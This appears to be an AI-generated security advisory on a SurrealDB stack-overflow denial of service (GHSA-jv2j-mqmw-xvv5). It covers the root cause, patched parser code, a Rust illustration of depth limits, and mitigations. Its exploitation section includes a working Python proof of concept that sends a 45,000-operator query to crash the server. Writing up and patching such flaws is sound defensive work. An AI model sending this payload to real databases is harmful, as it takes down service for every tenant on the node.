CVEReports

Automated vulnerability intelligence platform. Comprehensive reports for high-severity CVEs generated by AI.

© 2026 CVEReports. All rights reserved.

Made with love by Amit Schendel & Alon Barad



GHSA-jv2j-mqmw-xvv5: Stack Overflow Denial of Service in SurrealDB Query Engine

Amit Schendel, Senior Security Researcher

Jun 20, 2026 · 6 min read

Executive Summary (TL;DR)

A stack overflow vulnerability in SurrealDB allows authenticated users to trigger an uncatchable process abort by submitting queries with thousands of chained binary operators. The issue is resolved in version 3.1.5 by introducing a parser-level recursion depth limit.

An authenticated denial-of-service vulnerability in SurrealDB allows remote attackers with query privileges to crash the server process. The issue arises from uncontrolled recursion during the compilation, serialization, or deallocation of exceptionally deep Abstract Syntax Trees (ASTs). While the iterative Pratt parser successfully handles long flat sequences of binary operators without triggering recursion limits, the resulting AST structure causes stack overflow in downstream recursive tree-walking components.

Vulnerability Overview

SurrealDB is a multi-model database engine written in Rust that processes queries through its custom query language, SurrealQL. Plaintext queries are processed by a syntactic analyzer that translates statements into an Abstract Syntax Tree (AST) before compiler lowering and execution. The primary attack surface resides in endpoints exposing query-execution capabilities, specifically the HTTP /sql and WebSocket /rpc endpoints.

This vulnerability, tracked under GHSA-jv2j-mqmw-xvv5, is classified under CWE-674 (Uncontrolled Recursion) and CWE-400 (Uncontrolled Resource Consumption). It allows an authenticated user with low privileges to crash the database engine by executing a query containing a highly nested or extremely long flat chain of binary operators (e.g., thousands of additions or logical comparisons).

The impact is a total denial of service (DoS) affecting the SurrealDB node. Because SurrealDB operates as a single-process server, a crash terminates all active client connections and transactions across all database instances, namespaces, and tenants hosted on the affected system.

Root Cause Analysis

The root cause of this vulnerability lies in an architectural mismatch between the iterative query-parsing phase and the subsequent recursive AST-processing phases. SurrealDB's syntax parser uses a Pratt parser to handle operator precedence when parsing flat sequences of expressions and operators. Pratt parsing is executed iteratively using loops to append binary operators directly onto the spine of the AST.

Because this parsing phase operates iteratively rather than recursively, it successfully avoids standard call-stack limits or query-recursion guards. The parser processes arbitrarily long expressions without exhausting the call stack, producing an AST of arbitrary depth. For example, a query containing 50,000 chained addition operations yields a binary AST structure with a depth of 50,000 levels.

After parsing, downstream components walk the resulting AST to lower it to execution bytecode, serialize it for logs, or deallocate it, and those walks are recursive. In Rust, the compiler-generated Drop for a nested Box<Expr> structure drops each child before returning, so freeing a 50,000-deep tree needs on the order of 50,000 nested stack frames. That exceeds the 2 MiB default stack of a spawned Rust thread (Tokio worker threads included) long before the walk completes. Rust detects the overflow when the guard page is touched and aborts the whole process (the "thread ... has overflowed its stack" message followed by SIGABRT); unlike a panic, this cannot be caught with catch_unwind, so a single request takes down every connection the server holds.

Code Analysis and Remediation

The vulnerable implementation allowed the Pratt parser to build arbitrary tree depths because it lacked checks against the resulting AST height. Downstream components relied on standard recursion, which is highly sensitive to excessive nested structures. This code block shows how the Pratt parser built expression nodes iteratively, neglecting to validate overall depth constraints:

// Vulnerable parser pattern
fn parse_expr(&mut self, precedence: Precedence) -> Result<Expression, Error> {
    let mut left = self.parse_primary()?;
    while precedence < self.peek_precedence() {
        // Iterative loop permits infinite chaining
        // of binary operators, producing nested AST nodes
        left = self.parse_infix(left)?;
    }
    Ok(left)
}

The security patch introduced in SurrealDB version 3.1.5 resolves this vulnerability by establishing a strict recursion-depth budget during expression parsing. The expr_recursion_limit parameter (configurable via SURREAL_MAX_EXPRESSION_PARSING_DEPTH) is enforced directly in the parser logic. This prevents the construction of over-deep ASTs, raising a syntax error before any recursive traversals can be executed:

// Patched parser pattern
fn parse_expr(&mut self, precedence: Precedence, depth: u32) -> Result<Expression, Error> {
    // Enforce depth limit to prevent downstream stack overflow
    if depth > self.expr_recursion_limit {
        return Err(Error::MaxExpressionDepthExceeded);
    }
    let mut left = self.parse_primary(depth + 1)?;
    while precedence < self.peek_precedence() {
        left = self.parse_infix(left, depth + 1)?;
    }
    Ok(left)
}

The fix sits at the ingestion layer, so no downstream compiler, serializer, or Drop implementation ever receives an AST deeper than the budget. The caveat is that the budget is only meaningful relative to the stack of the thread that walks the tree: the downstream walkers remain recursive, so an operator who raises SURREAL_MAX_EXPRESSION_PARSING_DEPTH far above the default reopens the same crash. Treat the limit as a deliberate ceiling sized against the worker-thread stack, not as a tuning knob.
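The block below is an added example written for this report, not SurrealDB's parser or any code from the advisory. It models both halves of the root-cause and patch sections in a form that compiles stand-alone: a Pratt-style loop that builds a left-leaning Add tree iteratively (so the tree gets deep without the parser's call stack getting deep), a depth budget checked before each node is created, and the downstream walk and Drop written with explicit heap stacks so that even an over-generous budget cannot abort the process. Every name here (Expr, Parser, ParseError::MaxExpressionDepthExceeded, depth_limit, deep_query) is this example's own, and the limit values are arbitrary; the constructed input mirrors the shape of the PoC payload.

```rust
// Added example for this report, not SurrealDB code: iterative Pratt-style
// tree building, a parse-time depth budget, and recursion-free walk and Drop.

pub enum Expr {
    Number(i64),
    Add(Box<Expr>, Box<Expr>),
}

// Move a node's children onto a worklist, leaving shallow leaves behind.
fn detach_children(e: &mut Expr, work: &mut Vec<Expr>) {
    if let Expr::Add(l, r) = e {
        work.push(std::mem::replace(&mut **l, Expr::Number(0)));
        work.push(std::mem::replace(&mut **r, Expr::Number(0)));
    }
}

// The compiler-generated Drop recurses once per level; this one uses a heap
// worklist, so freeing a 100,000-deep tree needs constant stack.
impl Drop for Expr {
    fn drop(&mut self) {
        let mut work = Vec::new();
        detach_children(self, &mut work);
        while let Some(mut node) = work.pop() {
            detach_children(&mut node, &mut work); // `node` is shallow now; its drop is trivial
        }
    }
}

#[derive(Debug, PartialEq)]
pub enum ParseError {
    UnexpectedToken(String),
    MaxExpressionDepthExceeded { limit: usize }, // hypothetical analogue of the patched parser's error
}

pub struct Parser {
    pub depth_limit: usize, // hypothetical analogue of the advisory's expr_recursion_limit
}

impl Parser {
    // Parses "N + N + ..." with a Pratt-style loop. Left-associativity wraps the
    // accumulated `left` each iteration, so tree depth = operators + 1 no matter
    // how little call stack the loop uses; the budget is checked before the
    // node is built, which is what keeps every downstream walker under it.
    pub fn parse(&self, src: &str) -> Result<Expr, ParseError> {
        let mut tokens = src.split_whitespace();
        let mut left = parse_primary(tokens.next())?;
        let mut depth = 1usize;
        while let Some(op) = tokens.next() {
            if op != "+" {
                return Err(ParseError::UnexpectedToken(op.to_string()));
            }
            depth += 1;
            if depth > self.depth_limit {
                return Err(ParseError::MaxExpressionDepthExceeded { limit: self.depth_limit });
            }
            let right = parse_primary(tokens.next())?;
            left = Expr::Add(Box::new(left), Box::new(right));
        }
        Ok(left)
    }
}

fn parse_primary(tok: Option<&str>) -> Result<Expr, ParseError> {
    let t = tok.ok_or_else(|| ParseError::UnexpectedToken("<eof>".to_string()))?;
    t.parse::<i64>().map(Expr::Number).map_err(|_| ParseError::UnexpectedToken(t.to_string()))
}

// Tree height via an explicit stack; the recursive form of this walk is the
// kind of traversal that overflows on the unpatched server.
pub fn depth(expr: &Expr) -> usize {
    let mut max: usize = 0;
    let mut stack = vec![(expr, 1usize)];
    while let Some((node, d)) = stack.pop() {
        max = max.max(d);
        if let Expr::Add(l, r) = node {
            stack.push((&**l, d + 1));
            stack.push((&**r, d + 1));
        }
    }
    max
}

// Constructed input shaped like the PoC payload: "1 + 1 + ... + 1".
pub fn deep_query(n_ops: usize) -> String {
    format!("1{}", " + 1".repeat(n_ops))
}

fn main() {
    let query = deep_query(100_000);
    match (Parser { depth_limit: 1_000 }).parse(&query) {
        Err(ParseError::MaxExpressionDepthExceeded { limit }) => println!("rejected at depth limit {limit}"),
        _ => println!("unexpected result from budgeted parser"),
    }
    // No budget: a 100,001-level tree is built, measured and freed on a default
    // 2 MiB thread because none of the walks above recurse.
    let ast = (Parser { depth_limit: usize::MAX }).parse(&query).ok().expect("chain parses");
    println!("depth = {}", depth(&ast));
    drop(ast);
}
```

Run it with cargo run: the budgeted parser rejects the 100,000-operator chain in milliseconds, while the unbudgeted parse of the same input yields a tree 100,001 levels deep that can still be measured and freed because neither walk recurses. Deleting the manual Drop impl so the compiler-generated one runs instead should reproduce the abort on a 2 MiB thread, which is the unpatched behaviour the advisory describes.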

Exploitation & Attack Methodology

To exploit this vulnerability, an attacker must have valid credentials with permission to execute arbitrary SurrealQL queries. The attack is performed by sending a single, malformed query consisting of a highly repetitive sequence of binary operators, such as addition (+) or logical operators (AND, OR). This payload can be transmitted via HTTP POST to the /sql endpoint or via persistent WebSocket frames to /rpc.

The HTTP /sql endpoint enforces a default 1 MiB request-body limit, but the payload does not need to approach it: 45,000 chained " + 1" terms is roughly 180 KB of text and yields a tree about 45,000 levels deep, far more than a 2 MiB thread stack can walk recursively. The WebSocket /rpc endpoint is an equally reliable vector and typically tolerates larger frames.

No specialized tools are required. The following Python script shows how a low-privileged authenticated session triggers the crash over HTTP:

import requests

# Lab target and placeholder credentials; adjust for the instance under test.
url = "http://localhost:8000/sql"
# NS/DB are the header names used by this script; confirm the namespace/database
# header names documented for the server version before relying on them.
headers = {"Accept": "application/json", "NS": "test", "DB": "test"}
# Flat chain of 45,000 additions (~180 KB): the iterative parser accepts it,
# recursive lowering/serialization/Drop of the resulting AST overflows the stack.
payload = "RETURN 1" + " + 1" * 45000 + ";"

try:
    response = requests.post(url, data=payload, headers=headers, auth=("user", "pass"), timeout=60)
    # A patched server (3.1.5 or later) answers with a parse error instead of dying.
    print("Status:", response.status_code)
    print(response.text[:300])
except requests.exceptions.ConnectionError:
    print("[+] Success: Connection dropped. SurrealDB process terminated.")

Impact Assessment

The impact is confined to availability. The stack overflow aborts the whole process, so every namespace and database served by that node goes offline until it is restarted. The vulnerability does not permit code execution or data disclosure, and it does not corrupt on-disk data: the malicious statement never reaches execution, and transactions from other clients that were in flight at the moment of the abort are discarded rather than half-applied, though those clients must retry them.

The CVSS v3.1 score is calculated as 6.5 (Medium). The score is limited by the requirement of valid credentials (PR:L). However, for multi-tenant SaaS environments or applications exposing raw query endpoints to low-privileged users, the impact is severe. An attacker can repeatedly execute the exploit to maintain a persistent state of denial of service, blocking all database transactions on the targeted host.

Remediation & Mitigation Guidance

The definitive fix for this vulnerability is upgrading SurrealDB to version 3.1.5 or later. If immediate upgrading is not possible, administrators should implement the following workarounds to reduce risk:

  1. Start the server with the --deny-arbitrary-query capability flag so that ad-hoc SurrealQL from non-administrative sessions is refused at the query endpoints. This removes the attack path for every account that does not genuinely need raw query access, which in most deployments is everyone except operators and the application's own service identity.

  2. Cap request size at the reverse proxy in front of the /sql endpoint (for NGINX this is client_max_body_size; Envoy has an equivalent buffer limit). A ceiling in the tens of kilobytes blocks the long operator chains but may also reject legitimate bulk statements, so size it against real traffic. A body-size limit does not constrain frames on an upgraded WebSocket connection, so /rpc needs a separate frame-size control if the proxy offers one; otherwise restrict who may open it.

  3. Run the process under a supervisor (systemd with Restart=on-failure, or a Kubernetes restart policy) so the node comes back without operator intervention. This bounds outage duration but does not stop an attacker from re-sending the query in a loop, so pair it with alerting on repeated stack-overflow aborts and on the source of the offending requests.

Technical Appendix

CVSS Score
6.5/ 10
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Affected Systems

SurrealDB Server

Affected Versions Detail

Product: SurrealDB
Affected Versions: >= 3.0.0, < 3.1.5
Fixed Version: 3.1.5

Attribute / Detail

CWE ID: CWE-674, CWE-400
Attack Vector: Network
CVSS v3.1 Score: 6.5 (Medium)
Exploit Status: Proof-of-Concept
CISA KEV Status: Not Listed
Impact: Denial of Service (Process Abort)

MITRE ATT&CK Mapping

T1499.004 Endpoint Denial of Service: Application or System Exploitation (Impact)
T1078 Valid Accounts (Initial Access)
CWE-674
Uncontrolled Recursion

The software directs the execution flow using recursion, but does not limit the number of recursive steps, leading to stack consumption and process termination.

References & Sources

  • [1] GitHub Security Advisory GHSA-jv2j-mqmw-xvv5
  • [2] SurrealDB GitHub Repository
  • [3] SurrealQL Operators Documentation

